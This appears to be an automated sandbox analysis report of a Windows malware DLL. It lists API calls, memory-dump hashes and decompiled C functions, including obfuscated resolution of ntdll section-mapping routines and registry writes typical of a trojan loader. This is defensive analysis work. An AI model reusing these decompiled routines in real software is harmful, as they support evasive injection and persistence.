                                                                                                                                                                                                                                0x736ddcd9
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736ddcda
                                                                                                                                                                                                                                0x736ddbfc
                                                                                                                                                                                                                                0x736ddc0b
                                                                                                                                                                                                                                0x736ddc0c
                                                                                                                                                                                                                                0x736ddc0f
                                                                                                                                                                                                                                0x736ddc11
                                                                                                                                                                                                                                0x736ddc16
                                                                                                                                                                                                                                0x736dde27
                                                                                                                                                                                                                                0x736dde29
                                                                                                                                                                                                                                0x736dde2b
                                                                                                                                                                                                                                0x736dde2e
                                                                                                                                                                                                                                0x736dde33
                                                                                                                                                                                                                                0x736dde3c
                                                                                                                                                                                                                                0x736dde3f
                                                                                                                                                                                                                                0x736dde40
                                                                                                                                                                                                                                0x736dde44
                                                                                                                                                                                                                                0x736dde47
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4a
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde4e
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde51
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde53
                                                                                                                                                                                                                                0x736dde57
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc1c
                                                                                                                                                                                                                                0x736ddc20
                                                                                                                                                                                                                                0x736ddc22
                                                                                                                                                                                                                                0x736ddc25
                                                                                                                                                                                                                                0x736ddc28
                                                                                                                                                                                                                                0x736ddc2c
                                                                                                                                                                                                                                0x736ddc2d
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc31
                                                                                                                                                                                                                                0x736ddc34
                                                                                                                                                                                                                                0x736ddc39
                                                                                                                                                                                                                                0x736ddc45
                                                                                                                                                                                                                                0x736ddc4a
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc4d
                                                                                                                                                                                                                                0x736ddc52
                                                                                                                                                                                                                                0x736ddc54
                                                                                                                                                                                                                                0x736ddc57
                                                                                                                                                                                                                                0x736ddc59

APIs
• GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 736DDB73
• __fassign.LIBCMT ref: 736DDD52
• __fassign.LIBCMT ref: 736DDD6F
• WriteFile.KERNEL32(?,736DC31E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDDB7
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 736DDDF7
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 736DDEA3
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4031098158-0
                                                                                                                                                                                                                                • Opcode ID: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction ID: 478704e6cb27ff5b10fd0181870b68765d82861f3ddcd779b127fcb5b8cdcf05
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f75a8ef814a51c41fe9b03306741acfb950da0c224c19a53e6fe6e68daeb38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4D1CE76D112989FDF11DFE8C980AEDBBB5FF49310F28015AE956BB281D730A906CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A81143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 00A81157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A81169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A811EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 852c3dc1b5e252e96943694b541037fd26e9bd57abcd941e58fa24be64086fcd
                                                                                                                                                                                                                                • Instruction ID: 9a28e17fc066ff0f5fe405a8d4a945a2d0a161d230ba1c84f1930edeb79b4e46
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 852c3dc1b5e252e96943694b541037fd26e9bd57abcd941e58fa24be64086fcd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A415336D00609AFDB01EFF8D844AAEB7B9EF49310F144525EE10EB160DA719D06CBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t54 = E00A85157(0x20);
                                                                                                                                                                                                                                				if(_t54 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t1 = _t23 + 0xa8e11a; // 0x4c44544e
                                                                                                                                                                                                                                					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                					_t26 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					_t2 = _t26 + 0xa8e782; // 0x7243775a
                                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                                					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                					if(_t28 == 0) {
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						E00A853BB(_t54);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t30 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t5 = _t30 + 0xa8e76f; // 0x614d775a
                                                                                                                                                                                                                                						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t33 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                							_t7 = _t33 + 0xa8e4ce; // 0x6e55775a
                                                                                                                                                                                                                                							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                							if(_t35 == 0) {
                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t36 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                								_t9 = _t36 + 0xa8e406; // 0x4e6c7452
                                                                                                                                                                                                                                								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                								if(_t38 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t39 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                									_t11 = _t39 + 0xa8e792; // 0x6c43775a
                                                                                                                                                                                                                                									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                									if(_t41 == 0) {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                										_t44 = E00A85C55(_t54, _a8);
                                                                                                                                                                                                                                										_v8 = _t44;
                                                                                                                                                                                                                                										if(_t44 != 0) {
                                                                                                                                                                                                                                											goto L8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_a12 = _t54;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A874C1,?,00000001,?,?,00000000,00000000), ref: 00A8687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A8689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A868B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A868C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A868DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A868F5
                                                                                                                                                                                                                                  • Part of subcall function 00A85C55: memset.NTDLL ref: 00A85CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: 1a31e2a11ea68b8ea196b230a250174ce11078c72dca280b4c03d16a74c7079e
                                                                                                                                                                                                                                • Instruction ID: 626b06de849f52cbc75d7d04a82cc7690a12aa96b3146ec95c30b07001bae82c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a31e2a11ea68b8ea196b230a250174ce11078c72dca280b4c03d16a74c7079e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E212CB590060AEFE710EFA9DD44EAABBFCEF043547004065F959C7251E770E906CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D8137(void* __ecx) {
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = __ecx;
                                                                                                                                                                                                                                				if( *0x736eb020 != 0xffffffff) {
                                                                                                                                                                                                                                					_t24 = GetLastError();
                                                                                                                                                                                                                                					_t11 = E736D898D(_t13, __eflags,  *0x736eb020);
                                                                                                                                                                                                                                					_t14 = _t23;
                                                                                                                                                                                                                                					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						_t11 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						__eflags = _t11;
                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                							_t4 = E736D89C8(_t14, __eflags,  *0x736eb020, 0xffffffff);
                                                                                                                                                                                                                                							__eflags = _t4;
                                                                                                                                                                                                                                							if(_t4 != 0) {
                                                                                                                                                                                                                                								_push(0x28);
                                                                                                                                                                                                                                								_t27 = E736D9908();
                                                                                                                                                                                                                                								_t18 = 1;
                                                                                                                                                                                                                                								__eflags = _t27;
                                                                                                                                                                                                                                								if(__eflags == 0) {
                                                                                                                                                                                                                                									L8:
                                                                                                                                                                                                                                									_t11 = 0;
                                                                                                                                                                                                                                									E736D89C8(_t18, __eflags,  *0x736eb020, 0);
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t8 = E736D89C8(_t18, __eflags,  *0x736eb020, _t27);
                                                                                                                                                                                                                                									_pop(_t18);
                                                                                                                                                                                                                                									__eflags = _t8;
                                                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                                                										_t11 = _t27;
                                                                                                                                                                                                                                										_t27 = 0;
                                                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E736D9721(_t27);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					SetLastError(_t24);
                                                                                                                                                                                                                                					return _t11;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,736D7CA5,736D74C3,736D6EDC,?,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D), ref: 736D8145
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 736D8153
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 736D816C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,736D7114,?,00000001,?,?,00000001,?,736E9A30,0000000C,736D720D,?,00000001,?), ref: 736D81BE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction ID: 02efab8df2a6382d2f725095310dc715f54188fb4d11c6f5fdecb592459af44e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceb11d6aafd2f52919b6237827f5b6992150b922f7a36233ceca5df0772ae9e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4301283366C3175EFB052676AC8CB5A2FA8EB05E713300329E129961D5FF22180D5144
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E00A84847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int* _v16;
                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t59;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				char _t98;
                                                                                                                                                                                                                                				signed int* _t100;
                                                                                                                                                                                                                                				intOrPtr* _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = __ecx;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				_t98 = _a16;
                                                                                                                                                                                                                                				if(_t98 == 0) {
                                                                                                                                                                                                                                					__imp__( &_v284,  *0xa8d37c);
                                                                                                                                                                                                                                					_t91 = 0x80000002;
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t59 = E00A83037( &_v284,  &_v284);
                                                                                                                                                                                                                                					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00A82B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00A853BB(_a8);
						goto L29;
					}
					_t64 =  *0xa8d2b0; // 0x1ae9bb8
					_t16 = _t64 + 0xc; // 0x1ae9c86
					_t65 = E00A83037(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00a8c0
						if(E00A89BAF(_t97,  *_t33, _t91, _a8,  *0xa8d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xa8d2e0; // 0x105a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xa8ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xa8ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00A85E8A(_t69,  *0xa8d374,  *0xa8d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xa8d2e0; // 0x105a5a8
									_t44 = _t71 + 0xa8e83e; // 0x74666f53
									_t73 = E00A83037(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00a8c0
										E00A89BED( *_t47, _t91, _a8,  *0xa8d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d00a8c0
										E00A89BED( *_t49, _t91, _t99,  *0xa8d370, _a16);
										E00A853BB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00a8c0
									E00A89BED( *_t40, _t91, _a8,  *0xa8d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d00a8c0
									E00A89BED( *_t43, _t91, _a8,  *0xa8d370, _a16);
								}
								if( *_t101 != 0) {
									E00A853BB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00a8c0
					_t81 = E00A863D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00a8c0
							E00A89BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00A853BB(_t100);
						_t98 = _a16;
					}
					E00A853BB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00A8A929(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xa8d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                0x00a849dd
                                                                                                                                                                                                                                0x00a849dd
                                                                                                                                                                                                                                0x00a84a35
                                                                                                                                                                                                                                0x00a84a41
                                                                                                                                                                                                                                0x00a84a37
                                                                                                                                                                                                                                0x00a84a3a
                                                                                                                                                                                                                                0x00a84a3a
                                                                                                                                                                                                                                0x00a84a35
                                                                                                                                                                                                                                0x00a849ae
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84975
                                                                                                                                                                                                                                0x00a8491e
                                                                                                                                                                                                                                0x00a84921
                                                                                                                                                                                                                                0x00a84928
                                                                                                                                                                                                                                0x00a8492e
                                                                                                                                                                                                                                0x00a84931
                                                                                                                                                                                                                                0x00a84933
                                                                                                                                                                                                                                0x00a8493f
                                                                                                                                                                                                                                0x00a84942
                                                                                                                                                                                                                                0x00a84942
                                                                                                                                                                                                                                0x00a84948
                                                                                                                                                                                                                                0x00a8494d
                                                                                                                                                                                                                                0x00a8494d
                                                                                                                                                                                                                                0x00a84953
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84953
                                                                                                                                                                                                                                0x00a84861
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84888
                                                                                                                                                                                                                                0x00a84888
                                                                                                                                                                                                                                0x00a84894
                                                                                                                                                                                                                                0x00a848a7
                                                                                                                                                                                                                                0x00a848ad
                                                                                                                                                                                                                                0x00a848b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a848b5

APIs
• StrChrA.SHLWAPI(00A851FC,0000005F,00000000,00000000,00000104), ref: 00A8487A
• lstrcpy.KERNEL32(?,?), ref: 00A848A7
  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
  • Part of subcall function 00A89BED: lstrlenW.KERNEL32(?,?,?,00A84A10,3D00A8C0,80000002,00A851FC,00A82DE9,74666F53,4D4C4B48,00A82DE9,?,3D00A8C0,80000002,00A851FC,?), ref: 00A89C12
  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
• lstrcpy.KERNEL32(?,00000000), ref: 00A848C9
Strings
Memory Dump Source
• Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
Similarity
• API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
• String ID: ($\
• API String ID: 3924217599-1512714803
• Opcode ID: aac0ca58c6c6d0fdcb1a02b84cbc756e4f7cd9e6b07df3d8eec055f80af8351f
• Instruction ID: 4db2b5c45e65118aa00ccca3d3e2ef100753a4c37ac07896382d4b0f777e79ce
• Opcode Fuzzy Hash: aac0ca58c6c6d0fdcb1a02b84cbc756e4f7cd9e6b07df3d8eec055f80af8351f
• Instruction Fuzzy Hash: D3517A7210060AEFDF25FFA0DD44EAA7BB9FF08354F104524FA259A161E732DA26DB11
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E736DAB09(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
	intOrPtr _t14;
	intOrPtr _t15;
	intOrPtr _t17;
	intOrPtr _t36;
	intOrPtr* _t38;
	intOrPtr _t39;

	_t38 = _a4;
	if(_t38 != 0) {
		__eflags =  *_t38;
		if( *_t38 != 0) {
			_t14 = E736DB595(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
			__eflags = _t14;
			if(__eflags != 0) {
				_t36 = _a8;
				__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
				if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
					L10:
					_t15 = E736DB595(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
					__eflags = _t15;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
						_t17 = 0;
						__eflags = 0;
					} else {
						E736DA1ED(GetLastError());
						_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
					}
					L13:
					L14:
					return _t17;
				}
				_t17 = E736DABD0(_t36, _t14);
				__eflags = _t17;
				if(_t17 != 0) {
					goto L13;
				}
				goto L10;
			}
			E736DA1ED(GetLastError());
			_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
			goto L14;
		}
		_t39 = _a8;
		__eflags =  *((intOrPtr*)(_t39 + 0xc));
		if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
			L5:
			 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
			_t17 = 0;
			 *((intOrPtr*)(_t39 + 0x10)) = 0;
			goto L14;
		}
		_t17 = E736DABD0(_t39, 1);
		__eflags = _t17;
		if(_t17 != 0) {
			goto L14;
		}
		goto L5;
	}
	E736DABF7(_a8);
	return 0;
}










                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 736DAB0E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                • API String ID: 0-1872383224
